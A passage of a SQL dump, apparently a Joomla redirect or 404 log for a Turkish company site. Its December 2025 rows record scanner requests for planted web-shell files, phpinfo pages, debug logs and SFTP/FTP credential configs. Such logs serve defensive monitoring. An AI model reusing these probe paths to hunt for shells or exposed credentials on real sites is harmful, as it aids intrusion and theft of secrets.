00:00:00',301),(50490,'http://3s-technologies.com.tr/tr/zsz.php',NULL,'','',4,0,'2025-12-11 14:51:29','0000-00-00 00:00:00',301),(50491,'http://3s-technologies.com.tr/tr/h2a2ck.php',NULL,'','',6,0,'2025-12-11 14:51:30','0000-00-00 00:00:00',301),(50492,'http://3s-technologies.com.tr/tr/trplv.php',NULL,'','',1,0,'2025-12-11 14:51:34','0000-00-00 00:00:00',301),(50493,'http://3s-technologies.com.tr/en/num.php',NULL,'https://www.yahoo.com/','',60,0,'2025-12-11 15:24:56','0000-00-00 00:00:00',301),(50494,'http://3s-technologies.com.tr/tr/modules/mod_simplefileuploadv1.3/elements/i8hqok6nr.php',NULL,'http://3s-technologies.com.tr/modules/mod_simplefileuploadv1.3/elements/i8HQoK6nR.php','',3,0,'2025-12-11 15:58:25','0000-00-00 00:00:00',301),(50495,'https://3s-technologies.com.tr/tr/donate',NULL,'','',7,0,'2025-12-11 23:50:48','0000-00-00 00:00:00',301),(50496,'http://3s-technologies.com.tr/tr/donate',NULL,'','',1,0,'2025-12-11 23:50:49','0000-00-00 00:00:00',301),(50497,'http://3s-technologies.com.tr/tr/public/z.php',NULL,'','',1,0,'2025-12-13 05:45:18','0000-00-00 00:00:00',301),(50498,'https://3s-technologies.com.tr/en/https:/3s-technologies.com.tr/en/component/search/?itemid=593&format=opensearch',NULL,'','',3,0,'2025-12-13 07:35:51','0000-00-00 00:00:00',301),(50499,'https://3s-technologies.com.tr/en/?format=feed&type=atom',NULL,'','',4,0,'2025-12-13 07:35:52','0000-00-00 00:00:00',301),(50500,'https://3s-technologies.com.tr/en/#nav',NULL,'','',4,0,'2025-12-13 07:35:52','0000-00-00 00:00:00',301),(50501,'https://3s-technologies.com.tr/en/https:/3s-technologies.com.tr/en/',NULL,'','',3,0,'2025-12-13 07:35:53','0000-00-00 00:00:00',301),(50502,'https://3s-technologies.com.tr/en/#main',NULL,'','',3,0,'2025-12-13 07:35:57','0000-00-00 00:00:00',301),(50503,'https://3s-technologies.com.tr/en/https:/www.ledbazaar.net',NULL,'','',2,0,'2025-12-13 16:56:36','0000-00-00 00:00:00',301),(50504,'https://3s-technologies.com.tr/en/http:/www.joomla.org/',NULL,'','',2,0,'2025-12-13 16:56:38','0000-00-00 00:00:00',301),(50505,'https://3s-technologies.com.tr/en/https:/3s-technologies.com.tr/en/component/search/http:/www.joomla.org/',NULL,'','',1,0,'2025-12-13 16:56:38','0000-00-00 00:00:00',301),(50506,'https://3s-technologies.com.tr/en/https:/3s-technologies.com.tr/en/component/search/#nav',NULL,'','',1,0,'2025-12-13 16:56:38','0000-00-00 00:00:00',301),(50507,'https://3s-technologies.com.tr/en/#wrapper2',NULL,'','',2,0,'2025-12-13 16:56:38','0000-00-00 00:00:00',301),(50508,'https://3s-technologies.com.tr/en/https:/3s-technologies.com.tr/en/component/search/#wrapper2',NULL,'','',1,0,'2025-12-13 16:56:38','0000-00-00 00:00:00',301),(50509,'http://3s-technologies.com.tr/tr/rz.php',NULL,'','',5,0,'2025-12-13 18:08:47','0000-00-00 00:00:00',301),(50510,'http://3s-technologies.com.tr/en/txets.php',NULL,'https://www.google.fr/','',30,0,'2025-12-13 20:34:07','0000-00-00 00:00:00',301),(50511,'http://3s-technologies.com.tr/en/wp-includes/block-bindings/index.php',NULL,'https://www.google.com/','',36,0,'2025-12-13 20:34:52','0000-00-00 00:00:00',301),(50512,'http://3s-technologies.com.tr/en/wp-includes/js/dist/development/index.php',NULL,'https://www.google.com/','',23,0,'2025-12-13 20:34:57','0000-00-00 00:00:00',301),(50513,'http://mail.3s-technologies.com.tr/tr/css/up.php',NULL,'','',3,0,'2025-12-13 23:30:34','0000-00-00 00:00:00',301),(50514,'http://mail.3s-technologies.com.tr/tr/static/as.php',NULL,'','',3,0,'2025-12-13 23:32:00','0000-00-00 00:00:00',301),(50515,'http://mail.3s-technologies.com.tr/tr/zxz.php',NULL,'','',3,0,'2025-12-13 23:33:30','0000-00-00 00:00:00',301),(50516,'https://3s-technologies.com.tr/tr/admin/phpinfo.php',NULL,'','',1,0,'2025-12-14 04:43:29','0000-00-00 00:00:00',301),(50517,'https://3s-technologies.com.tr/tr/symfony/_profiler/phpinfo',NULL,'','',1,0,'2025-12-14 04:43:32','0000-00-00 00:00:00',301),(50518,'https://3s-technologies.com.tr/tr/dashboard/info.php',NULL,'','',1,0,'2025-12-14 04:43:35','0000-00-00 00:00:00',301),(50519,'https://3s-technologies.com.tr/tr/wp-content/debug.log',NULL,'','',1,0,'2025-12-14 04:43:36','0000-00-00 00:00:00',301),(50520,'https://3s-technologies.com.tr/tr/wp-includes/fmadmin.php',NULL,'','',1,0,'2025-12-14 15:20:48','0000-00-00 00:00:00',301),(50521,'https://3s-technologies.com.tr/tr/500.php',NULL,'','',1,0,'2025-12-14 15:20:49','0000-00-00 00:00:00',301),(50522,'https://3s-technologies.com.tr/tr/locale.php',NULL,'','',1,0,'2025-12-14 15:20:50','0000-00-00 00:00:00',301),(50523,'https://3s-technologies.com.tr/tr/xinsertx.php',NULL,'','',1,0,'2025-12-14 15:20:50','0000-00-00 00:00:00',301),(50524,'https://3s-technologies.com.tr/tr/readme.php',NULL,'','',1,0,'2025-12-14 15:20:50','0000-00-00 00:00:00',301),(50525,'https://3s-technologies.com.tr/tr/wp-includes/assets/res.php',NULL,'','',1,0,'2025-12-14 15:20:50','0000-00-00 00:00:00',301),(50526,'https://3s-technologies.com.tr/tr/wp-content/plugins/wp-file-manager/images/wp-am.php',NULL,'','',1,0,'2025-12-14 15:20:50','0000-00-00 00:00:00',301),(50527,'https://3s-technologies.com.tr/tr/puts.php',NULL,'','',1,0,'2025-12-14 15:20:50','0000-00-00 00:00:00',301),(50528,'https://3s-technologies.com.tr/tr/wp-content/plugins/wp-file-manager/images/data.php',NULL,'','',1,0,'2025-12-14 15:20:50','0000-00-00 00:00:00',301),(50529,'http://3s-technologies.com.tr/tr/.well-known/ans.php',NULL,'','',1,0,'2025-12-15 12:28:51','0000-00-00 00:00:00',301),(50530,'http://3s-technologies.com.tr/tr/.well-known/lo.php',NULL,'','',1,0,'2025-12-15 12:28:52','0000-00-00 00:00:00',301),(50531,'http://3s-technologies.com.tr/tr/wp-includes/block-supports/abe.php',NULL,'','',1,0,'2025-12-15 12:28:53','0000-00-00 00:00:00',301),(50532,'http://3s-technologies.com.tr/tr/wp-content/plugins/wp-mail-smtp/src/content.php',NULL,'','',1,0,'2025-12-15 12:28:54','0000-00-00 00:00:00',301),(50533,'http://3s-technologies.com.tr/tr/wp-site-analytics.php',NULL,'','',1,0,'2025-12-15 12:28:54','0000-00-00 00:00:00',301),(50534,'http://3s-technologies.com.tr/tr/wp-content/languages/plugins/admin.php',NULL,'','',2,0,'2025-12-15 12:28:55','0000-00-00 00:00:00',301),(50535,'http://3s-technologies.com.tr/tr/wp-includes/js/tinymce/plugins/fullscreen/about.php',NULL,'','',1,0,'2025-12-15 12:28:56','0000-00-00 00:00:00',301),(50536,'http://3s-technologies.com.tr/tr/wp-includes/js/470594182xmx.php',NULL,'','',1,0,'2025-12-15 12:28:58','0000-00-00 00:00:00',301),(50537,'http://3s-technologies.com.tr/tr/images/resumes/by.php',NULL,'','',1,0,'2025-12-15 12:28:59','0000-00-00 00:00:00',301),(50538,'http://3s-technologies.com.tr/tr/wp-includes/random_compat/bala.php',NULL,'','',2,0,'2025-12-15 12:29:00','0000-00-00 00:00:00',301),(50539,'http://3s-technologies.com.tr/tr/upload/2021_02_08/config.inc.php',NULL,'','',1,0,'2025-12-15 12:29:01','0000-00-00 00:00:00',301),(50540,'http://3s-technologies.com.tr/tr/wp-includes/css/dist/editor/radio.php',NULL,'','',1,0,'2025-12-15 12:29:02','0000-00-00 00:00:00',301),(50541,'http://3s-technologies.com.tr/tr/wp-includes/requests/transport/post.php',NULL,'','',1,0,'2025-12-15 12:29:02','0000-00-00 00:00:00',301),(50542,'http://mail.3s-technologies.com.tr/tr/wp-includes/rest-api/admin.php',NULL,'','',1,0,'2025-12-15 16:02:20','0000-00-00 00:00:00',301),(50543,'http://mail.3s-technologies.com.tr/tr/wp-content/plugin.php',NULL,'','',7,0,'2025-12-15 16:02:23','0000-00-00 00:00:00',301),(50544,'http://mail.3s-technologies.com.tr/tr/wp-admin/js/widgets/xmrlpc.php',NULL,'','',1,0,'2025-12-15 16:02:24','0000-00-00 00:00:00',301),(50545,'http://mail.3s-technologies.com.tr/tr/wp-includes/text/wp.php',NULL,'','',7,0,'2025-12-15 16:02:26','0000-00-00 00:00:00',301),(50546,'http://mail.3s-technologies.com.tr/tr/wp-admin/network/chosen.php/wp-admin/css/colors/ectoplasm/wp-login.php',NULL,'','',1,0,'2025-12-15 16:02:28','0000-00-00 00:00:00',301),(50547,'http://mail.3s-technologies.com.tr/tr/assets/item.php',NULL,'','',15,0,'2025-12-15 16:02:29','0000-00-00 00:00:00',301),(50548,'http://mail.3s-technologies.com.tr/tr/shop/lock.php',NULL,'','',8,0,'2025-12-15 16:02:30','0000-00-00 00:00:00',301),(50549,'http://mail.3s-technologies.com.tr/tr/th/plugins/phpthumb/404.php',NULL,'','',8,0,'2025-12-15 16:02:31','0000-00-00 00:00:00',301),(50550,'http://mail.3s-technologies.com.tr/tr/wp-includes/css/dist/preferences/index.php',NULL,'','',8,0,'2025-12-15 16:02:31','0000-00-00 00:00:00',301),(50551,'http://mail.3s-technologies.com.tr/tr/files/log.php',NULL,'','',8,0,'2025-12-15 16:02:32','0000-00-00 00:00:00',301),(50552,'http://mail.3s-technologies.com.tr/tr/wp-includes/block-patterns/vuln.php',NULL,'','',2,0,'2025-12-15 16:02:35','0000-00-00 00:00:00',301),(50553,'http://mail.3s-technologies.com.tr/tr/wp-includes/images/media/wp-login.php',NULL,'','',2,0,'2025-12-15 16:02:36','0000-00-00 00:00:00',301),(50554,'http://mail.3s-technologies.com.tr/tr/wp-content/uploads/autoload_classmap.php',NULL,'','',2,0,'2025-12-15 16:02:37','0000-00-00 00:00:00',301),(50555,'http://mail.3s-technologies.com.tr/tr/images/404.php',NULL,'','',2,0,'2025-12-15 16:02:38','0000-00-00 00:00:00',301),(50556,'http://mail.3s-technologies.com.tr/tr/wp-content/languages/asus.php',NULL,'','',2,0,'2025-12-15 16:02:39','0000-00-00 00:00:00',301),(50557,'http://mail.3s-technologies.com.tr/tr/wp-content/plugins/wp-login.php',NULL,'','',2,0,'2025-12-15 16:02:41','0000-00-00 00:00:00',301),(50558,'http://mail.3s-technologies.com.tr/tr/wp-content/themes/wp-pridmag/admin.php',NULL,'','',2,0,'2025-12-15 16:02:43','0000-00-00 00:00:00',301),(50559,'http://mail.3s-technologies.com.tr/tr/wp-content/plugins/background-image-cropper/plugins.php',NULL,'','',2,0,'2025-12-15 16:02:44','0000-00-00 00:00:00',301),(50560,'http://mail.3s-technologies.com.tr/tr/wp-includes/text/diff/renderer/wp-login.php',NULL,'','',2,0,'2025-12-15 16:02:46','0000-00-00 00:00:00',301),(50561,'http://mail.3s-technologies.com.tr/tr/wp-admin/images/users.php',NULL,'','',8,0,'2025-12-15 16:02:47','0000-00-00 00:00:00',301),(50562,'http://mail.3s-technologies.com.tr/tr/wp-includes/rest-api/endpoints/index.php',NULL,'','',2,0,'2025-12-15 16:02:47','0000-00-00 00:00:00',301),(50563,'http://mail.3s-technologies.com.tr/tr/wp-includes/random_compat/about.php',NULL,'','',2,0,'2025-12-15 16:02:48','0000-00-00 00:00:00',301),(50564,'http://mail.3s-technologies.com.tr/tr/index/about.php',NULL,'','',2,0,'2025-12-15 16:02:49','0000-00-00 00:00:00',301),(50565,'http://mail.3s-technologies.com.tr/tr/wp-admin/user/content.php',NULL,'','',7,0,'2025-12-15 16:02:51','0000-00-00 00:00:00',301),(50566,'http://mail.3s-technologies.com.tr/tr/wp-includes/images/chosen.php',NULL,'','',7,0,'2025-12-15 16:02:52','0000-00-00 00:00:00',301),(50567,'http://mail.3s-technologies.com.tr/tr/.well-known/acme-challenge/parx.php',NULL,'','',1,0,'2025-12-15 16:02:52','0000-00-00 00:00:00',301),(50568,'http://mail.3s-technologies.com.tr/tr/wp-includes/sodium_compat/src/core32/curve25519/ge/about.php',NULL,'','',1,0,'2025-12-15 16:02:53','0000-00-00 00:00:00',301),(50569,'http://mail.3s-technologies.com.tr/tr/wp-content/languages/index.php',NULL,'','',18,0,'2025-12-15 16:02:56','0000-00-00 00:00:00',301),(50570,'http://mail.3s-technologies.com.tr/tr/wp-admin/css/colors/blue/wp-login.php',NULL,'','',4,0,'2025-12-15 16:02:57','0000-00-00 00:00:00',301),(50571,'http://mail.3s-technologies.com.tr/tr/admin/fckeditor/editor/filemanager/updates.php',NULL,'','',4,0,'2025-12-15 16:02:58','0000-00-00 00:00:00',301),(50572,'http://mail.3s-technologies.com.tr/tr/wp-content/uploads/file.php',NULL,'','',4,0,'2025-12-15 16:02:59','0000-00-00 00:00:00',301),(50573,'http://mail.3s-technologies.com.tr/tr/wp-includes/requests/response/wp-login.php',NULL,'','',4,0,'2025-12-15 16:03:00','0000-00-00 00:00:00',301),(50574,'http://mail.3s-technologies.com.tr/tr/wp-admin/css/colors/coffee/alfa-rex.php',NULL,'','',4,0,'2025-12-15 16:03:01','0000-00-00 00:00:00',301),(50575,'http://mail.3s-technologies.com.tr/tr/wp-includes/simplepie/cache/about.php',NULL,'','',3,0,'2025-12-15 16:03:01','0000-00-00 00:00:00',301),(50576,'http://mail.3s-technologies.com.tr/tr/wp-includes/sodium_compat/src/alfa-rex.php',NULL,'','',4,0,'2025-12-15 16:03:02','0000-00-00 00:00:00',301),(50577,'http://mail.3s-technologies.com.tr/tr/wp-admin/css/colors/blue/index.php',NULL,'','',37,0,'2025-12-15 16:03:03','0000-00-00 00:00:00',301),(50578,'http://mail.3s-technologies.com.tr/tr/wp-mail.php/wp-includes/id3/wp-mail.php',NULL,'','',4,0,'2025-12-15 16:03:03','0000-00-00 00:00:00',301),(50579,'http://mail.3s-technologies.com.tr/tr/wp-content/plugins/revslider/public/assets/assets/sources/wp-login.php',NULL,'','',1,0,'2025-12-15 16:03:04','0000-00-00 00:00:00',301),(50580,'http://mail.3s-technologies.com.tr/tr/css/item.php',NULL,'','',1,0,'2025-12-15 16:03:07','0000-00-00 00:00:00',301),(50581,'http://mail.3s-technologies.com.tr/tr/wp-content/uploads/2020/admin.php',NULL,'','',1,0,'2025-12-15 16:03:07','0000-00-00 00:00:00',301),(50582,'http://mail.3s-technologies.com.tr/tr/assets/images/wp-login.php',NULL,'','',4,0,'2025-12-15 16:03:09','0000-00-00 00:00:00',301),(50583,'http://mail.3s-technologies.com.tr/tr/wp-includes/assets/themes.php',NULL,'','',10,0,'2025-12-15 16:03:10','0000-00-00 00:00:00',301),(50584,'http://mail.3s-technologies.com.tr/tr/wp-content/plugins/dummyyummy/wp-signup.php',NULL,'','',6,0,'2025-12-15 16:03:11','0000-00-00 00:00:00',301),(50585,'http://mail.3s-technologies.com.tr/tr/wp-content/uploads/chosen.php',NULL,'','',4,0,'2025-12-15 16:03:12','0000-00-00 00:00:00',301),(50586,'http://mail.3s-technologies.com.tr/tr/wp-includes/style-engine/autoload_classmap.php',NULL,'','',5,0,'2025-12-15 16:03:13','0000-00-00 00:00:00',301),(50587,'http://mail.3s-technologies.com.tr/tr/js/style.php',NULL,'','',10,0,'2025-12-15 16:03:14','0000-00-00 00:00:00',301),(50588,'http://mail.3s-technologies.com.tr/tr/wp-content/languages/wp-login.php',NULL,'','',5,0,'2025-12-15 16:03:15','0000-00-00 00:00:00',301),(50589,'http://mail.3s-technologies.com.tr/tr/wp-includes/js/tinymce/skins/wordpress/images/about.php',NULL,'','',4,0,'2025-12-15 16:03:17','0000-00-00 00:00:00',301),(50590,'http://mail.3s-technologies.com.tr/tr/wp-includes/simplepie/content/type/index.php',NULL,'','',4,0,'2025-12-15 16:03:17','0000-00-00 00:00:00',301),(50591,'http://mail.3s-technologies.com.tr/tr/.well-known/dropdown.php',NULL,'','',4,0,'2025-12-15 16:03:18','0000-00-00 00:00:00',301),(50592,'http://mail.3s-technologies.com.tr/tr/wp-includes/rest-api/autoload_classmap.php',NULL,'','',4,0,'2025-12-15 16:03:19','0000-00-00 00:00:00',301),(50593,'http://mail.3s-technologies.com.tr/tr/edit.php',NULL,'','',92,0,'2025-12-15 16:03:20','0000-00-00 00:00:00',301),(50594,'http://mail.3s-technologies.com.tr/tr/wp-content/themes/travelscape/json.php',NULL,'','',11,0,'2025-12-15 16:03:21','0000-00-00 00:00:00',301),(50595,'http://mail.3s-technologies.com.tr/tr/wp-admin/wp-admin.php',NULL,'','',16,0,'2025-12-15 16:03:22','0000-00-00 00:00:00',301),(50596,'http://mail.3s-technologies.com.tr/tr/wp-content/upgrade/shell.php',NULL,'','',7,0,'2025-12-15 16:03:23','0000-00-00 00:00:00',301),(50597,'http://mail.3s-technologies.com.tr/tr/wp-admin/user/bak.php',NULL,'','',7,0,'2025-12-15 16:03:24','0000-00-00 00:00:00',301),(50598,'http://mail.3s-technologies.com.tr/tr/wp-admin/css/about.php',NULL,'','',9,0,'2025-12-15 16:03:25','0000-00-00 00:00:00',301),(50599,'http://mail.3s-technologies.com.tr/tr/wp-admin/date.php',NULL,'','',7,0,'2025-12-15 16:03:26','0000-00-00 00:00:00',301),(50600,'http://mail.3s-technologies.com.tr/tr/index/x.php',NULL,'','',13,0,'2025-12-15 16:03:27','0000-00-00 00:00:00',301),(50601,'http://mail.3s-technologies.com.tr/tr/wp-includes/network.php',NULL,'','',7,0,'2025-12-15 16:03:27','0000-00-00 00:00:00',301),(50602,'http://mail.3s-technologies.com.tr/tr/.well-known/.well-known/cc.php',NULL,'','',7,0,'2025-12-15 16:03:28','0000-00-00 00:00:00',301),(50603,'http://mail.3s-technologies.com.tr/tr/wp-includes/pomo/chosen.php',NULL,'','',7,0,'2025-12-15 16:03:29','0000-00-00 00:00:00',301),(50604,'http://mail.3s-technologies.com.tr/tr/css/cong.php',NULL,'','',7,0,'2025-12-15 16:03:30','0000-00-00 00:00:00',301),(50605,'http://mail.3s-technologies.com.tr/tr/wp-includes/customize/shell.php',NULL,'','',7,0,'2025-12-15 16:03:31','0000-00-00 00:00:00',301),(50606,'http://mail.3s-technologies.com.tr/tr/wp-content/mah.php',NULL,'','',7,0,'2025-12-15 16:03:31','0000-00-00 00:00:00',301),(50607,'http://mail.3s-technologies.com.tr/tr/wp-includes/block-supports/variations.php',NULL,'','',6,0,'2025-12-15 16:03:34','0000-00-00 00:00:00',301),(50608,'http://mail.3s-technologies.com.tr/tr/wp-includes/rest-api/wp-login.php',NULL,'','',7,0,'2025-12-15 16:03:35','0000-00-00 00:00:00',301),(50609,'http://mail.3s-technologies.com.tr/tr/wp-content/languages/link.php',NULL,'','',1,0,'2025-12-15 16:03:36','0000-00-00 00:00:00',301),(50610,'http://mail.3s-technologies.com.tr/tr/wp-includes/sitemaps/about.php',NULL,'','',4,0,'2025-12-15 16:03:37','0000-00-00 00:00:00',301),(50611,'http://mail.3s-technologies.com.tr/tr/wp-includes/customize/autoload_classmap.php',NULL,'','',1,0,'2025-12-15 16:03:38','0000-00-00 00:00:00',301),(50612,'http://mail.3s-technologies.com.tr/tr/wp-includes/fonts/item.php',NULL,'','',1,0,'2025-12-15 16:03:39','0000-00-00 00:00:00',301),(50613,'http://mail.3s-technologies.com.tr/tr/wp-content/themes/index.php',NULL,'','',27,0,'2025-12-15 16:03:40','0000-00-00 00:00:00',301),(50614,'http://mail.3s-technologies.com.tr/tr/wp-content/themes/classic/inc/json.php',NULL,'','',7,0,'2025-12-15 16:03:41','0000-00-00 00:00:00',301),(50615,'http://mail.3s-technologies.com.tr/tr/wp-content/plugins/seoplugins/wso112233.php',NULL,'','',1,0,'2025-12-15 16:03:41','0000-00-00 00:00:00',301),(50616,'http://mail.3s-technologies.com.tr/tr/wp-includes/sodium_compat/link.php',NULL,'','',1,0,'2025-12-15 16:03:42','0000-00-00 00:00:00',301),(50617,'http://mail.3s-technologies.com.tr/tr/wp-includes/images/wlw/wp-login.php',NULL,'','',1,0,'2025-12-15 16:03:43','0000-00-00 00:00:00',301),(50618,'http://3s-technologies.com.tr/tr/images/images/images/cache.php?pass=331b3e1aefcffd452db92a2c1c61c525',NULL,'','',2,0,'2025-12-15 19:06:34','0000-00-00 00:00:00',301),(50619,'http://3s-technologies.com.tr/tr/images/images/images/images/cache.php?pass=26aadf8d261066584120034c6303716f',NULL,'','',2,0,'2025-12-15 19:06:34','0000-00-00 00:00:00',301),(50620,'http://3s-technologies.com.tr/tr/images/images/images/images/images/cache.php?pass=c93ef613c69e7f82b5446413c46b0aea',NULL,'','',2,0,'2025-12-15 19:06:35','0000-00-00 00:00:00',301),(50621,'http://3s-technologies.com.tr/tr/images/images/images/images/images/images/cache.php?pass=6765bcbc711528e2760d2133cdf17685',NULL,'','',2,0,'2025-12-15 19:06:36','0000-00-00 00:00:00',301),(50622,'http://3s-technologies.com.tr/tr/images/images/images/images/images/images/images/cache.php?pass=e2f2d10231c076274cbc76336b530c67',NULL,'','',2,0,'2025-12-15 19:06:37','0000-00-00 00:00:00',301),(50623,'http://3s-technologies.com.tr/tr/images/images/images/images/images/images/images/images/cache.php?pass=cfe52c34e32b72e0844fd3ac8c834e96',NULL,'','',1,0,'2025-12-15 19:06:38','0000-00-00 00:00:00',301),(50624,'http://3s-technologies.com.tr/tr/images/images/images/images/images/images/images/images/images/cache.php?pass=b4a0ce1105e127632d397c11b662c026',NULL,'','',1,0,'2025-12-15 19:06:39','0000-00-00 00:00:00',301),(50625,'http://3s-technologies.com.tr/tr/images/images/images/images/images/images/images/images/images/images/cache.php?pass=1105a5a43bd65cd41776c4740f232849',NULL,'','',2,0,'2025-12-15 19:06:39','0000-00-00 00:00:00',301),(50626,'http://3s-technologies.com.tr/tr/images/images/images/images/images/images/images/images/images/images/images/cache.php?pass=341a599afb55832de18a18d89cff3c4e',NULL,'','',2,0,'2025-12-15 19:06:40','0000-00-00 00:00:00',301),(50627,'http://3s-technologies.com.tr/tr/wp-admin/network/network/cache.php?pass=38ef0afddaa8ead7a21aef35fab6d209',NULL,'','',2,0,'2025-12-15 19:06:41','0000-00-00 00:00:00',301),(50628,'http://3s-technologies.com.tr/tr/assets/as.php',NULL,'','',5,0,'2025-12-16 05:34:55','0000-00-00 00:00:00',301),(50629,'http://3s-technologies.com.tr/tr/public/assets',NULL,'','',5,0,'2025-12-16 05:35:15','0000-00-00 00:00:00',301),(50630,'http://3s-technologies.com.tr/tr/uploads/vx.php',NULL,'','',5,0,'2025-12-16 05:35:17','0000-00-00 00:00:00',301),(50631,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/ectoplasm/index.php',NULL,'','',1,0,'2025-12-16 05:35:23','0000-00-00 00:00:00',301),(50632,'http://3s-technologies.com.tr/tr/wp-content/plugins/beteng13/vx.php',NULL,'','',1,0,'2025-12-16 05:35:38','0000-00-00 00:00:00',301),(50633,'http://3s-technologies.com.tr/tr/wp-content/uploads/2025',NULL,'','',11,0,'2025-12-16 05:35:44','0000-00-00 00:00:00',301),(50634,'http://3s-technologies.com.tr/tr/wp-content/vx.php',NULL,'','',5,0,'2025-12-16 05:35:45','0000-00-00 00:00:00',301),(50635,'http://3s-technologies.com.tr/tr/wp-includes/id3/simi.php',NULL,'','',1,0,'2025-12-16 05:35:48','0000-00-00 00:00:00',301),(50636,'http://3s-technologies.com.tr/tr/wp-includes/blocks/post-author-name',NULL,'','',6,0,'2025-12-16 05:36:04','0000-00-00 00:00:00',301),(50637,'https://3s-technologies.com.tr/en/.vscode/sftp.json',NULL,'https://3s-technologies.com.tr/.vscode/sftp.json','',1,0,'2025-12-16 06:10:37','0000-00-00 00:00:00',301),(50638,'https://3s-technologies.com.tr/en/sftp-config.json',NULL,'https://3s-technologies.com.tr/sftp-config.json','',1,0,'2025-12-16 06:10:37','0000-00-00 00:00:00',301),(50639,'https://3s-technologies.com.tr/en/.ftpconfig',NULL,'https://3s-technologies.com.tr/.ftpconfig','',1,0,'2025-12-16 06:10:37','0000-00-00 00:00:00',301),(50640,'http://3s-technologies.com.tr/en/.vscode/sftp.json',NULL,'http://3s-technologies.com.tr/.vscode/sftp.json','',1,0,'2025-12-16 06:10:38','0000-00-00 00:00:00',301),(50641,'http://3s-technologies.com.tr/en/.ftpconfig',NULL,'http://3s-technologies.com.tr/.ftpconfig','',1,0,'2025-12-16 06:10:38','0000-00-00 00:00:00',301),(50642,'http://3s-technologies.com.tr/tr/testyuj.php',NULL,'','',2,0,'2025-12-16 07:39:42','0000-00-00 00:00:00',301),(50643,'http://3s-technologies.com.tr/tr/budmachine/web/s.php?p=',NULL,'','',2,0,'2025-12-16 07:39:48','0000-00-00 00:00:00',301),(50644,'http://3s-technologies.com.tr/tr/wp-64wscx6shd.php',NULL,'','',5,0,'2025-12-16 07:39:49','0000-00-00 00:00:00',301),(50645,'http://3s-technologies.com.tr/tr/okxh.php',NULL,'','',22,0,'2025-12-16 07:39:50','0000-00-00 00:00:00',301),(50646,'http://3s-technologies.com.tr/tr/atex1.php',NULL,'','',7,0,'2025-12-16 07:39:59','0000-00-00 00:00:00',301),(50647,'http://3s-technologies.com.tr/tr/kdgok.php',NULL,'','',5,0,'2025-12-16 07:40:00','0000-00-00 00:00:00',301),(50648,'http://3s-technologies.com.tr/tr/sid-file.php',NULL,'','',2,0,'2025-12-16 07:40:03','0000-00-00 00:00:00',301),(50649,'http://3s-technologies.com.tr/tr/l3gi0n.php',NULL,'','',3,0,'2025-12-16 07:40:04','0000-00-00 00:00:00',301),(50650,'http://3s-technologies.com.tr/tr/o2.php',NULL,'','',2,0,'2025-12-16 07:40:09','0000-00-00 00:00:00',301),(50651,'http://3s-technologies.com.tr/tr/inghl.php',NULL,'','',2,0,'2025-12-16 07:40:12','0000-00-00 00:00:00',301),(50652,'http://3s-technologies.com.tr/tr/karma_57c3d4.php',NULL,'','',2,0,'2025-12-16 07:40:17','0000-00-00 00:00:00',301),(50653,'http://3s-technologies.com.tr/tr/fc72f.php',NULL,'','',2,0,'2025-12-16 07:40:18','0000-00-00 00:00:00',301),(50654,'http://3s-technologies.com.tr/tr/jjrpo.php',NULL,'','',2,0,'2025-12-16 07:40:20','0000-00-00 00:00:00',301),(50655,'http://3s-technologies.com.tr/tr/jdlqi.php',NULL,'','',2,0,'2025-12-16 07:40:29','0000-00-00 00:00:00',301),(50656,'http://3s-technologies.com.tr/tr/khgdl.php',NULL,'','',2,0,'2025-12-16 07:40:31','0000-00-00 00:00:00',301),(50657,'http://3s-technologies.com.tr/tr/xopvne.php',NULL,'','',3,0,'2025-12-16 07:40:36','0000-00-00 00:00:00',301),(50658,'http://3s-technologies.com.tr/tr/lm18.php',NULL,'','',2,0,'2025-12-16 07:40:37','0000-00-00 00:00:00',301),(50659,'http://3s-technologies.com.tr/tr/z123.php',NULL,'','',2,0,'2025-12-16 07:40:50','0000-00-00 00:00:00',301),(50660,'http://3s-technologies.com.tr/tr/ccea.php',NULL,'','',3,0,'2025-12-16 07:40:52','0000-00-00 00:00:00',301),(50661,'http://3s-technologies.com.tr/tr/a5e0a.php',NULL,'','',19,0,'2025-12-16 07:40:53','0000-00-00 00:00:00',301),(50662,'http://3s-technologies.com.tr/tr/s121ws2s.php',NULL,'','',2,0,'2025-12-16 07:40:56','0000-00-00 00:00:00',301),(50663,'http://3s-technologies.com.tr/tr/783de.php',NULL,'','',2,0,'2025-12-16 07:41:00','0000-00-00 00:00:00',301),(50664,'http://3s-technologies.com.tr/tr/lm15.php',NULL,'','',19,0,'2025-12-16 07:41:01','0000-00-00 00:00:00',301),(50665,'http://3s-technologies.com.tr/tr/rzki.php',NULL,'','',21,0,'2025-12-16 07:41:07','0000-00-00 00:00:00',301),(50666,'http://3s-technologies.com.tr/tr/rp8zi.php',NULL,'','',2,0,'2025-12-16 07:41:14','0000-00-00 00:00:00',301),(50667,'http://3s-technologies.com.tr/tr/cc3.php',NULL,'','',2,0,'2025-12-16 07:41:15','0000-00-00 00:00:00',301),(50668,'http://3s-technologies.com.tr/tr/wps.php',NULL,'','',25,0,'2025-12-16 07:41:18','0000-00-00 00:00:00',301),(50669,'http://3s-technologies.com.tr/tr/qv9gbcjwzgk.php',NULL,'','',2,0,'2025-12-16 07:41:18','0000-00-00 00:00:00',301),(50670,'http://3s-technologies.com.tr/tr/qsntqiho.php',NULL,'','',2,0,'2025-12-16 07:41:19','0000-00-00 00:00:00',301),(50671,'http://3s-technologies.com.tr/tr/qjaqjahu.php',NULL,'','',2,0,'2025-12-16 07:41:20','0000-00-00 00:00:00',301),(50672,'http://3s-technologies.com.tr/tr/qhlagswd9ds.php',NULL,'','',2,0,'2025-12-16 07:41:21','0000-00-00 00:00:00',301),(50673,'http://3s-technologies.com.tr/tr/pwyjwrfr.php',NULL,'','',2,0,'2025-12-16 07:41:22','0000-00-00 00:00:00',301),(50674,'http://3s-technologies.com.tr/tr/pnrzcp6wtyy.php',NULL,'','',2,0,'2025-12-16 07:41:23','0000-00-00 00:00:00',301),(50675,'http://3s-technologies.com.tr/tr/ox8xhkkw.php',NULL,'','',2,0,'2025-12-16 07:41:24','0000-00-00 00:00:00',301),(50676,'http://3s-technologies.com.tr/tr/oc460l3x.php',NULL,'','',2,0,'2025-12-16 07:41:25','0000-00-00 00:00:00',301),(50677,'http://3s-technologies.com.tr/tr/nwqz649fie7.php',NULL,'','',2,0,'2025-12-16 07:41:27','0000-00-00 00:00:00',301),(50678,'http://3s-technologies.com.tr/tr/nucqsqeg.php',NULL,'','',2,0,'2025-12-16 07:41:28','0000-00-00 00:00:00',301),(50679,'http://3s-technologies.com.tr/tr/mhpglaje.php',NULL,'','',2,0,'2025-12-16 07:41:29','0000-00-00 